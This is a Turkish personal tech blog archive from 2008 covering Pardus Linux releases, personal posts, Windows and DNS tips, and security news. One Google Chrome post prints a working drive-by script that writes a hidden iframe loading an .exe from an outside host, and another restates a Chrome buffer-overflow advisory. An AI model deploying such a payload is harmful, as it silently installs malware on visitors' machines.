27 Haziran 2008'de kararlı sürümünü yayınladığımız Pardus 2008'in ilk ara sürümü Pardus 2008.1 Hyaena hyaena, sunucularda yerini aldı. Pardus 2008'in bu ilk ara sürümü, Pardus geliştiricilerinin geçtiğimiz 2.5 ay boyunca yaptığı tüm hata düzeltme, iyileştirme ve yeni özellik eklemelerini iceriyor.

Pardus 2008.1 Hyaena hyaena, ismini nesli tehlikede olan bir başka Anadolu canlısından alıyor : Pardus 2008.1, çizgili sırtlan olarak bilinen Hyaena hyaena'yı anıyor.

Pardus 2008.1 Hyaena hyaena'yı indirmek için web sayfamIzI ziyaret ederek yansılarımız hakkında bilgi alabilir, veya bu ara sürümümüzü indirmek için doğrudan ftp sunucumuza bağlanabilirsiniz :

ftp://ftp.pardus.org.tr/pub/pardus/kurulan/2008.1/
ftp://ftp.pardus.org.tr/pub/pardus/calisan/2008.1/

Pardus'un tüm ara sürümlerinde olduğu gibi, Pardus 2008 kullanıcılarının Pardus 2008.1 Hyaena hyaena kullanmak için tek yapmaları gereken Paket Yöneticisi veya PiSi ile tüm güncellemelerini tamamlamak.

Kaynak: duyuru at pardus.org.tr

5 Eylül 2008 Cuma

Google Chrome 4. Açık

Bilgisayarlarında google chrome kurulu olanlar dikkat etsin. Uzaktan kod çalıştırma açığı nedeniyle bilgisayarlarında istem dışı şeyler olabilir. Bu açık ile ilgili Detaylı ingilizce bilgi aşağıda verilmiştir.

PoC Code is in Attach file because this file is saved in 'Unicode' type for exploit.

Here is Description for this Vuln :
· Type of Issue : Buffer Overflow.
· Affected Software : Google Chrome 0.2.149.27.
· Exploitation Environment : Google Chrome (Language: Vietnamese) on Windows XP SP2.
· Impact: Remote code execution.
· Rating : Critical .
· Description :
The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving
a malicious page with an overly long title (<_title> tag in HTML), the program causes a stack-based overflow and makes
it possible for attackers to execute arbitrary code on users’ systems.
· How an attacker could exploit the issue :
To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code.
He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would
be executed, giving him the privilege to make use of the affected system.
· Discoverer : Le Duc Anh - SVRT - Bkis
· About SVRT :
SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes
in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols
and embedded systems…
· Website : security.bkis.vn
· Mail : svrt[at]bkav.com.vn

4 Eylül 2008 Perşembe

Google Chrome İkinci Patlama :)


Google Chrome'un ikinci açığıda keşfedilmiş oldu. Uzaktan dosya yüklemeye izin veren bir açık. Bu açık ile saldırgan yaptığı bir web sayfasına sizi çekiyor ve bilgisayarınıza zararlı yazılımın otomatik olarak indirilmesini sağlıyor. Sonra neler yapılabileceği sizin hayal gücünüze kalmış.... Script aşağıda. Son olarak Google Chrome'un hala Beta olduğunu söylemekte fayda var :)

<script> document.write('<iframe src="http://vedatfetah.blogspot.com/test.exe" frameborder="0" width="0" height="0">'); </script> 

3 Eylül 2008 Çarşamba

Firefox'taki Kayıtlı Parolaları Görebilmek.

Bazen siz de benim gibi bazı forumlara üye olup arkasından uzun zaman sonra kayıtlı parolanın ne olduğunu hatırlamak ister misiniz? Firefox'ta çok basit bir yolu var. Şifrenin kayıtlı olduğu sayfada resimdeki kodu adres bara kopyalayıp yapıştırıyorsunuz ve bingo şifreniz :)

Daha kolay bir yol mu istiyorsunuz? O zaman şu yolu takip ediyorsunuz. Firefox menülerinden Araçlar / Seçenekler / Güvenlik / Kayıtlı Parolalar

Google Chrome 10 Kullanışlı Özellik

Google'ın yeni yazılımı Chrome ile ilgili öne çıkan 10 özellik videosu aşağıda iyi seyirler.

Google Chrome Çıktığı Gibi Patladı :)



Google arama motorunun duyurduğu Apple Safari tabanlı olarak tasarlanmış web gezgini daha ilk dakikalarında ilk gölünü yedi :) Demoyu görmek isteyenler aşağıdaki buraya tıkla yazısına tıklamaya çalışsın :)




Demo için BURAYA TIKLAYIN.

23 Ağustos 2008 Cumartesi

15 Eylül'de Pardus 2008.1


Pardus 2008'in ilk ara sürümü olan Pardus 2008.1'in sürüm takvimini belirlendi. Kendi araçlarımızdaki yeni özellikler, hata düzeltmeleri ve paket güncellemelerini içererek olan bu ara sürüm, kullanıcılarımızın yeni kurulum sonrası daha az güncelleme yapmalarını, güncel kurulumların daha sorunsuz olmasını sağlamayı amaçlıyor.

Her zamanki gibi, Pardus 2008 kullanıcıları sadece güncellemelerini takip ederek sistemlerini güncel ara sürüm seviyesine yükseltebilecekler.

Sürüm yöneticimiz Ekin Meroğlu'nun açıkladığı Pardus 2008.1 "Sürüm Takvimi" şöyle :

* Pardus 2008.1 Beta: 28 Ağustos 2008
* Pardus 2008.1 RC: 8 Eylül 2008
* Pardus 2008.1: 15 Eylül 2008



Pardus 2008.1 sürümüyle gelmesi beklenen pek çok yenilik var elbette... Bu yenilikleri şöyle sıralayabiliriz:

* Güncel Linux çekirdeği - Kernel 2.6.26.x güncel masaüstü ortamı - KDE 3.5.10
* 802.1x, Ad-hoc, VPN ve İnternet bağlantı paylaşımı özellikleri ile daha gelişmiş bir Ağ Yöneticisi
* Gereken yerelleştirme ve uluslararasılaştırma paketlerinin Kaptan Masaüstü tarafından kurulması
* KDE 3 ve KDE 4 tabanlı iki ayrı Çalışan CD
Kaynak: Özgürlük İçin

20 Ağustos 2008 Çarşamba

8 Dk.'da Nasıl Wireless Şifresi Kırılır....

Bu işin ne kadar kolay yapılabileceğini aşağıdaki video gözler önüne seriyor.

15 Ağustos 2008 Cuma

Joomla 1.5.x Administrator Şifre Resetleme Açığı


Joomla 1.5.5'e kadar olan 1.5.x sürümlerinde ortaya çıkarılan com_user ile ilgili bir açık nedeniyle "admin" kullanıcı adı olan şifre resetlenebilmektedir. Bu açığın etkilenmediği sistemler ise kullanıcı girişini zorunlu kılan siteler ve süper yönetici adı "admin" olmayanlardır. Eğer sistemdeki süper yöneticinizin adı admin değilse saldırganın süper yöneticinizin adını tahmin edip sisteminize erişmesi gerekmektedir.

Bu sebeple sisteminize zarar verilmeden önce joomla'nın orjinal sitesinden "1.5.5 to 1.5.6 Upgrade Package" dosyasını indirip kurmanız gerekmektedir.

9 Ağustos 2008 Cumartesi

Msn Virüs Belası

Aşağıdaki linkten msn'in baş ağrıtan virüsüne çözüm sunan bir yazılıma ulaşabilirsiniz.
Link: http://www.msnvirusremoval.com/

DNS cache Poisoning Flaw Çözümü

Son zamanlarda sıkça baş ağrıtan DNS sunucularda oluşmuş problemin birkaç çözümü bulunmaktadır. Eğer Checkpoint kullanıyorsanız SmartDefense modülünü kullanarak dışarıdan saldırıları engelleyebilirsiniz. Bunun için SmartDefense modülünde DNS sekmesi altında Scrambling ve Drop Inbound Request seçeneğinde DNS sunucularınızı belirtirseniz dışarıdan içeri DNS trafiğini kontrol altına alabilirsiniz. Ama sunucu bazında açığınızın olup olmadığını anlamak içinse buradaki noclicky perl scriptini kullanarak kontrol edebilirsiniz. Scripti çalıştırmak için ./noclicky bu yöntemi izleyebilirsiniz. Eğer script çalışmaz ise buradaki yamayı yüklemeyi deneyebilirsiniz. Yamayı yüklemek içinse: noclicky ile aynı dizine yüklediğiniz yamayı: $ patch -p0 <02-noclicky.patch> şeklinde yükleyebilirsiniz. Linux sunucularda DNS güvenliğini sağlamak için daha önce yazmış olduğum yazıyı kullanabilirsiniz. Windows sunucu üzerinde çalışıyorsanız son çıkan güvenlik güncellemelerini yüklemenizi tavsiye etmektedir Microsoft firması...
Dip Not: Eğer bunca karmaşa ile uğraşmadan test edebileceğim bir web sayfası var mı derseniz adresi http://www.doxpara.com/...

8 Ağustos 2008 Cuma

Tarih Çılgınlığında Bir Adım İlerisi

Bugün evleneli tam 8 ay oldu. 08.08.08'de 08. ayımız eşimle :) Bunu daha önceden düşünebilen kim vardı?

4 Ağustos 2008 Pazartesi

Açık Kaynak Kodlu Dizüstü Bilgisayar İzleme Sistemi...


ADEONA, Washington, California ve San Diego Üniversitelerinin üyelerinden oluşan bir proje. Bir yıllık çalışmaların sonucunda kayıp veya çalınan dizüstü bilgisayarların izlenebilmesini sağlayan bir sistem geliştirmişler.Sistem dizüstüne kuruluyor ve kurulumdan sonra bu program openDHT sunucuları ile şifreli bağlantı kuruyor. Çalınma veya kaybolma durumunda kullanıcı, şifresini girerek çalınan veya kaybolan dizüstü bilgisayarı IP ve en son bağlandığı internet noktalarını kullanarak takip edebiliyor.

Projenin ana sayfasına şuradan gözatabilir, programı da şuradan indirebilirsiniz.

2 Ağustos 2008 Cumartesi

Bir Ülke Nasıl Kazanıldı...


2006 yılında bugün askerliğim sırasında bir öğünümüzü üzüm hoşafı yiyerek geçirdik. Sebebi çok basit; resme bakan herkes anlayacaktır. Elinizdeki imkanlar olmadan dünyayı yeniden şekildirebilecek misiniz?

1 Ağustos 2008 Cuma

Eleştiriye Bak....

YORUMSUZ.

Youtube'a Türk Usulü Çözüm...

Ben ilk başta çok güldüm bu habere ama sanırım adamlar çok ciddi. Yani Allahın herhangi bir ülkesinden Türkiye aleyhine içerik konulacak yayınlanacak ama biz görmeyeceğiz (tahminen Türkiye çıkışları youtube.com.tr adresine yönlendirilecek). Deve kuşumuyuz biz. Oldu olacak bir de kafamızı kuma gömseydik. Çin'e gülüyorduk kendi başımıza geldi. Orjinal haber aşağıda...


Sorunun çözümü için YouTube ve Telekomünikasyon Kurumu yetkilileri arasında gerçekleştirilen görüşmelerde şirketin Türkiye'ye özgü bir arama motoru oluşturması kararlaştırıldı. Buna göre siteye Türkiye'den YouTube.tr ya da YouTube.com.tr adreslerinden ulaşılacak. Böylece sitede, İnternet Güvenliği Yasası'nda suç sayılan Atatürk'e hakaret, porno, müstehcenlik, kumar ve intihara özendirme gibi içerikler ayıklanmış olacak. Zaman'a konuşan Telekomünikasyon Kurumu Başkanı Tayfun Acarer, YouTube yetkilileriyle devam eden görüşmelerde çözüm için belli bir aşamaya gelindiğini açıkladı. Acarer, YouTube'un Türk halkının ulusal değerlerini, duyarlıklarını ve İnternet Güvenliği Yasası'nda belirtilen 9 katalog suçu dikkate alan YouTube.tr ya da YouTube.com.tr adıyla bir site oluşturacağını söyledi. YouTube'un, Almanya, Çin ve ABD için de benzer siteler kurduğunu ifade ederken, "İnternet kullanıcıları ister Youtube.com.tr'ye isterse de Almanya'nın ABD'nin Youtube'una girer." dedi. Acarer, önemli bir uyarıda bulunmadan da geçemedi: "Türk kullanıcıları, ülke hassasiyetlerini dikkate alan 'youtube.com.tr sitesine giriş yapsın." Tayfun Acarer, bundan sonra, YouTube ile Türkiye arasındaki hukuki ve idari işlemlerin, şirketin Türkiye'de açacağı temsilcilik vasıtasıyla yürütüleceğini kaydetti. Bugüne kadar YouTube'da 111 zararlı içerik tespit edildi, bunların 67'si siteden kaldırıldı. Ankara 11. Sulh Ceza Mahkemesi kararıyla Atatürk'e hakaret içeren yayınlar nedeniyle 6 Haziran 2008 tarihinden beri YouTube'a erişim yasak.


25 Temmuz 2008 Cuma

BIND 9.x Açığı

23 Temmuz 2008 Çarşamba

Windows XP'de Bir Klasör Nasıl Şifrelenir?


NOT: Yalnızca NTFS dosya sistemini kullanan birimlerdeki dosya ve klasörleri şifreleyebilirsiniz.

1.Başlat'ı tıklatın, Tüm Programlar'ın üzerine gelin, Donatılar'ın üzerine gelin ve sonra Windows Gezgini'ni tıklatın.
2.İstediğiniz klasörü bulun ve sağ tıklatın, ardından Özellikler'i tıklatın.
3.Genel sekmesinde Gelişmiş'i tıklatın.
4.Sıkıştırma veya Şifreleme öznitelikleri altında, Veriyi korumak için içeriği şifrele onay kutusunu seçin ve Tamam'ı tıklatın.
5.Tamam'ı tıklatın.
6.Görüntülenen Öznitelik Değişikliklerini Onayla iletişim kutusunda, aşağıdaki adımlardan birini kullanın:
Yalnızca klasörü şifrelemek isterseniz, Değişiklikleri yalnızca bu klasöre uygula'yı ve sonra da Tamam'ı tıklatın.
Klasörle birlikte varolan klasör içeriğini de şifrelemek isterseniz, Değişiklikleri bu klasör içine, alt klasör ve dosyalara uygula'yı ve sonra da Tamam'ı tıklatın.
Klasör şifreli bir klasöre dönüştürülür. Bu klasörde oluşturulan yeni dosyalar otomatik olarak şifrelenir. Bunun, klasör içeriğinin başkaları tarafından görüntülenmesini engellemeyeceğini unutmayın. Bu işlem, şifrelenmiş klasördeki öğelerin başkaları tarafından açılmasını engeller. Örneğin, şifrelenmiş klasörde oluşturulan bir Microsoft Word belgesi başka bir kullanıcı tarafından açılmaya çalışılırsa aşağıdaki ileti görüntülenir:
Word belgeyi açamıyor: Kullanıcıadı, erişim ayrıcalıklarına sahip değil
(sürücü:\dosyaadı.doc)
Başka bir kullanıcı şifrelenmiş klasördeki bir belgeyi sabit diskte farklı bir konuma kopyalamaya veya taşımaya çalışırsa aşağıdaki ileti görüntülenir:
Dosya veya Klasör Kopyalama Hatası

Dosyaadı kopyalanamıyor: Erişim reddedildi.

Diskin dolu veya yazmaya karşı korumalı olmadığından
ve dosyanın şu anda kullanımda olmadığından emin olun.

22 Temmuz 2008 Salı

DNS Güncellemeniz Gerçekleştiğinde Haberiniz Olsun...

Alan adınızın DNS adreslerini değiştirip gerçekleşti mi, gerçekleşmedi mi diye defalarca ping attığınız olduysa bu servis tam size göre.

Web ile ilgili ücretsiz kaynakları sunan WebResourcesDepot, alan adları ve hosting ile haşır neşir olanların çok işine yarayabilecek yeni bir servis açmış: DNSPinger.

DNSPinger çok basit bir arayüzle belirtmiş olduğunuz alan adına 24 saat boyunca ping atıyor ve IP adresi değiştiğinde sizi e-posta ile uyarıyor.

Kaynak: Bildirgeç

15 Temmuz 2008 Salı

Google'da Ceza Yer


Google Street View ceza yerse görüntü böyle olur :)

11 Temmuz 2008 Cuma

Son Günlerin Modası


Son günlerde herkesin gündemine oturan malum bilgisayar dosyalarının tarih değişikliği ile ilgili ufak bir ayrıntıdan bahsetmek istiyorum. Polisler dosya eklese de tarihini değiştiremez gibi abuk subuk bir yaklaşımla bazı televizyon kanallarında yayınlar dahi yapıldı. Peki değiştirilebilir mi bu tarih. Kesinlikle evet. Soldaki resme bakınca ne demek istediğimi anlayacaksınız. Ayrıca dosya düzenlenme saatini de değiştirmemiz mümkün :) Bilgisayarınız bağlanmadan yedeğini almanız gerekiyor yani anlayacağınız.

7 Temmuz 2008 Pazartesi

Youtube Sorunsalı


Youtube'a girebilmek için yapılabilecek çok basit birşey var. Hiçbir program yada ayarı değiştirmenize gerek kalmadan youtube'u izleyebiliyorsunuz. Yapmanız gereken aşağıdaki dosyayı bulup o dosyayı notepad ile açıp en alta iki satır eklemeniz.


Dosya c:\WINDOWS\system32\drivers\etc\hosts
Eklenecek satırlar:
208.117.236.70 youtube.com
208.117.236.70 www.youtube.com

Eğer dosya yazma korumalı hatası alırsanız attrib -r -h -s komutuyla korumayı kaldırabilirsiniz.

28 Haziran 2008 Cumartesi

Pardus 2008 Özgürlük için Bir Adım Daha...


Pardus projesinin en yeni teknolojiler ve en güncel yazılımlarla güçlendirilmiş yeni sürümü Pardus 2008 yayımlandı. Daha önceki tüm sürümleri gibi bir özgür yazılım olan Pardus 2008, GNU Genel Kamu Lisansı (GPL) ile özgürce dağıtılıp çoğaltılabiliyor. Pardus projesinin temel hedefleri olan kolay kurulum ve kullanım yönünde, gerek altyapı ve gerekse kullanıcı arayüzü düzeyinde önemli yeniliklere sahip olan Pardus 2008 aynı zamanda geniş donanım desteği, kararlı ve güvenilir Linux altyapısı ve tek bir CD ile gelen çok çeşitli uygulamaları ile masaüstü kullanıcılarına yepyeni bir özgürlük deneyimi yaşatmayı vaat ediyor.

Pardus 2008 ile gelen yenilikleri öğrenmek için Sürüm Notları sayfasını inceleyebilir ya da CD görüntüsünü indirmek için İndir sayfasına gidebilirsiniz.

Pardus 2008 ile daha özgür günler diliyoruz...

Kaynak: Pardus

24 Haziran 2008 Salı

Günün Sözü

Bir mıh bir nalı kurtarır.
Bir nal bir atı,
Bir at bir komutanı,
Bir komutan bir orduyu,
Bir ordu bir ülkeyi kurtarır..

11 Haziran 2008 Çarşamba

Hızlı İnternet Saçmalığı


Bugün gazetelerin online sayfalarını gezerken milleti nasıl kandırdıklarına yada internet konusunda ne kadar bilinçsiz bir toplum olduğumuza bir kere daha şahit oldum. Milliyet gazetesinin bir yazarının sloganı aynen şu: "Telekom süper hızlı internet VDSL2 için tarife onayını aldı. 10 güne kadar konutlar ve ofisler internete 169 YTL'ye bağlanacak. Yeni abonelikle bir film saniyelerle internetten indirilecek." Saniyeler içinde indirilecek film nasıl bir film? Sen o filmi saniyeler içinde indir ...... Ayrıca yeni yasalardan haberi yok sanırım yazarımızın. Telif hakları diye millet cayır cayır bağırırken sanırım bu arkadaş çatır çatır film indiriyor yasa dışı bir şekilde. Olayın diğer boyutu ise sağlanan internet hızının aşırı pahalılığı. Bu arkadaşın her halde tellcom firmasının tarifesinden de haberi yok :). Adam fiber getiriyorum diyor. 100 Mbit hat 109 YTL verecekken neden gidip enayi gibi bu hızın yarısından daha az bir hıza 128 YTL vereyim. Ben bişey anlamadım. Ya bu yazarımız araştırma özürlü yada sırf kurumun reklamını yapmak için ciddi paralar yedi. Başka bişey aklına gelen varsa yazsın. Belki gözümden kaçan bir nokta vardır :)


Sonuç olarak hala medyanın çarpık bilgilendirmeleri ve bilinçsiz toplumumuz sayesinde bir bardak suya bir şişe su parası ödemeye devam edeceğiz. 30 şeritli tarih öncesi yolunda iyi seyirler yazar bey.

6 Haziran 2008 Cuma

Her Canlının Son Görevi

Bu aralar yine karabulutlar dolaşıyor çevremde. Uzun zaman oldu yakınlarımdan birini defnedeli. Bugün amcamı defnettik. Son yolculuğunda yanında yürüdük. Allah rahmet eylesin. Ölümü ne kadar iyi tanıyoruz. Ben şahsen birçok kere gören ender insanlardan biriyim. Toplu ölümleri, arkadaşlarımı omzumda taşımanın ne olduğunu biliyorum ama ölüm sonrası olanları kimler bilir? Neler olur? Dünyanın gözü önünde yaşanan ama hala sırrı bilinemeyen ender olaylardan biridir. Hala buna gücümüz yetmiyor insanlık olarak. Geriye kalan ölenin hayatında yaptıkları ile anılmasıdır.

Ölüm

ölüm yaşamdan
bir bölümdür

ölüm iniştir karanlığa
aydınlıktan kaçıştır

ölüm borçtur
senedin ödenmiştir

ölüm dünyayı bırakıştır
yeni dünyayı arayıştır...

Altay Taşkın


5 Haziran 2008 Perşembe

Pardus 2008 Beta 1

Bu deneme sürümümüze her zaman olduğu gibi Pardus ftp sunucularından,

Pardus 2008 sürecinde önemli bir adım olan Beta 1 deneme sürümümü yayınlandı.

ftp://ftp.pardus.org.tr/pub/pardus/kurulan/2008/

adresini kullanarak ulaşabilirsiniz. Sorunsuz bir kurulum için lütfen dosyaları indirdikten sonra dosya özetlerini kontrol etmeyi unutmayın, CD’leri DAO modunda ve en fazla 16x hızında yazdığınızdan emin olun.


Bu sürümümüz ile daha fazla kullanıcının karşısına çıkan Pardus 2008′de kullanıcı ve geliştiricilerimizi birçok yenilik ve değişiklik bekliyor
- Bunlardan ilk anda göze çarpan birkaçı şöyle :

- Pardus teknolojileri : dbus tabanlı yeni COMAR, daha hızlı ve daha yetenekli bir PiSi, tamamen yenilenen YALI, yeni grafik yapılandırma arayüzü, kullanıcılarımıza çok daha fazla kişiselleştirme imkanı sunan yeni
Kaptan…

- Güncel masaüstü teknolojileri : Tüm masaüstünde eksiksiz policykit, consolekit ve dbus/COMAR entegrasyonu, Pulseaudio desteği, otomatik yazıcı tanıma altyapısı…

- Yeni görsel tasarım : Açılış ekranından simge setine, masaüstü arka planlarından uygulama açılış görsellerine kadar her noktası yenilenmiş bir Pardus..

- Geniş paket desteği : Her geçen gün genişleyen ve güncellenen paket deposu; temel sistemde gcc 4.3.1 RC, glibc 2.8, kernel 2.6.24.7, Python 2.5; masaüstünde OpenOffice 2.4.1.3, Firefox 3.0 RC1 gibi güncel bileşenler…

Pardus 2008, tüm bu değişiklikler ile gelişirken her zamanki temel özelliklerini de ihmal etmiyor : tüm masaüstünde Türkçe yazım denetimi, internet araçları, ofis yazılımları, çokluortam (resim, müzik, video vb)
oynatıcıları ve sayısız yazılım ile kullanıcılarının tüm gereksinimlerini karşılayacak tek bir CD olarak geliyor…

Pardus 2008 Beta’nın farkında olduğumuz fakat henüz düzeltmediğimiz bir hatası var : Türkçe ve İngilizce dışındaki dillerdeki kurulumlar paket kurulumunun hemen ardından sonlanıyor, dolayısıyla diğer dillerde kurulum şu anda desteklenmiyor.

Son olarak, bu sürümün bir deneme sürümü olduğunu bir kere daha hatırlatıyoruz : Sürümün kararlı ve olabildiğince hatasız olması için çalıştık, yine de bu sürümü kurar ve denerken lütfen deneme sürümü bir
yazılım kullandığınızı unutmayınız. Testlerinizde karşılaştığınız hataları ve iyileştirme isteklerinizi her zamanki gibi hata takip sistemimize (http://hata.pardus.org.tr) bekliyoruz.

Daha az problem yaşamanız için CD’leri DAO modunda ve en fazla 16x hızında yazmanızı tekrar hatırlatıyoruz.

Msn Virüsü


Son zamanlarda msn açıkken sürekli ileti geliyor. Ne gibi iletiler diye sorarsanız da; bu resimdeki sen misin?, kim silmiş ya da kim engellemiş gör! ve buna benzer iletiler geliyor ve arkasından da bir link geliyor tıklamam için…

- İlk önce mönitörün sağ alt tarafındaki msn logosuna sağ tıklayıp çıkış yapın…
- Buradaki dosyayı bilgisayarınıza indirin ve açın, (kayıt defterine eklemek istediğinizden emin misiniz diye soracak, siz evet deyin).
- Daha sonra bilgisayarınıza reset atın,
- Bilgisayar tamamen açıldıktan sonra başlat -> çalıştır-> cleanmgr yazın ve enter deyin,
- Sürücü seç diye pencere gelirse siz C ‘yi seçin ve disc temizleme işlemi başlayacaktır
- Daha sonra disc temizleme (C:) ekranı gelecektir ordan Temporary Internet Files, geri dönüşüm kutusunu seçin ve tamam ‘ı tıklayın.

Geçmiş olsun.

Pardus Ati ve Compiz Üçgeni.


Son güncellemeleri yaptıktan sonra yaşadığım sorun Compizin çalışmaması. Pencere kenarlıklarının yokolması. Klavyenin kilitlenmesi. Birçok yerde bu sorunun çözümünü aradım ancak klasik önerilerden öteye gidemedim. Denemelerim sonucunda meyvesini verdi. Problemin yegane çözümü Ati sürücüsünü indirip kurmak olacaktır. Sorun giderme aşamaları:

1. Ati ekran kartı sürücüsünün indirilmesi. ( http://ati.amd.com/support/driver.html )
2. Çalışma izninin ayarlanması. ( chmod a+x ati-install-xxx.run )
3. Sisteme sürücünün kurulması. ( sudo ati-instlal-xxx.run )
4. Kurulumdan aticonfig --initial komutunun çalıştırılması.
5. Bilgisayarın restart edilmesi.


3 Haziran 2008 Salı

Türk Yapımı Program ve Arama Motoru


Kendi evinde kendi bilgisayarında tam 4 ay boyunca çalışıp kendi arama motorunu kuran Denizli’de Pamukkale Üniversitesi Fen Edebiyat Fakültesi Matematik Bölümü öğrencisi Serkan Aslan, Mühendislik Fakültesi Bilgisayar Mühendisliği Bölümü Öğretim Üyesi Yrd. Doç. Dr. Abdülkadir Yaldır’ın yardımlarıyla Ceo Share''yi kurdu.

Hedefinin 3 ay içinde sitesinden ulaşılabilecek program ve oyun sayısının yaklaşık 250 bine çıkarmak istediğini söyleyen Serkan Aslan'ın kurduğu bu arama motorunda şu an 80 bin programa ve oyuna 30 salise ile 4 saniye arasında ulaşabiliyor.

Kaynak: Bildirgec.org

Paylaş

Twitter Delicious Facebook Digg Stumbleupon Favorites